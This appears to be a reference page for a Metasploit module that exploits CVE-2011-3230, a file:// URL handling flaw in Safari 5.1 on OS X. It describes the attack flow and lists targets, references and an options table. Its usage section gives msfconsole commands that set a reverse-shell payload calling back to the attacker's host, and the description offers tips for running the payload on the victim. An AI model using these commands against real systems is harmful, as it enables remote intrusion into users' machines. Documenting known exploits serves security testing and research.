Apple Safari file:// Arbitrary Code Execution
This module exploits a vulnerability found in Apple Safari on OSX platform. A policy issue in the handling of file:// URLs may allow arbitrary remote code execution under the context of the user. In order to trigger arbitrary remote code execution, the best way seems to be opening a share on the victim machine first (this can be SMB/WebDav/FTP, or a fileformat that OSX might automount), and then execute it in /Volumes/[share]. If there's some kind of bug that leaks the victim machine's current username, then it's also possible to execute the payload in /Users/[username]/Downloads/, or else bruteforce your way to getting that information. Please note that non-java payloads (*.sh extension) might get launched by Xcode instead of executing it, in that case please try the Java ones instead.
Exploit Rank
- Normal
Exploit Authors
- Aaron Sigel < >
- sinn3r < sinn3r [at] metasploit.com >
Vulnerability References
- CVE-2011-3230
- http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from...
- http://support.apple.com/kb/HT5000
Exploit Targets
- 0 - Safari 5.1 on OSX (default)
- 1 - Safari 5.1 on OSX with Java
Exploit Development
Similar Exploit Modules
- exploit/osx/browser/mozilla_mchannel
- exploit/osx/browser/safari_libtiff
- exploit/osx/browser/safari_metadata_archive
- exploit/osx/browser/software_update
Exploit Usage Information
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/osx/browser/safari_file_policy
msf exploit(safari_file_policy) > show payloads
msf exploit(safari_file_policy) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(safari_file_policy) > set LHOST [MY IP ADDRESS]
msf exploit(safari_file_policy) > exploit
Exploit Module Options
| HTTPPORT | The HTTP server port (default: 80) |
| SRVHOST | The local host to listen on. This must be an address on the local machine or 0.0.0.0 (default: 0.0.0.0) |
| SRVPORT | The local port to use for the FTP server (Do not change) (default: 21) |
| SSL | Negotiate SSL for incoming connections |
| SSLCert | Path to a custom SSL certificate (default is randomly generated) |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) (default: SSL3) |
| URIPATH | The URI to use for this exploit (default is random) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| ListenerComm | The specific communication channel to use for this service |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| TCP::max_send_size | Maximum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |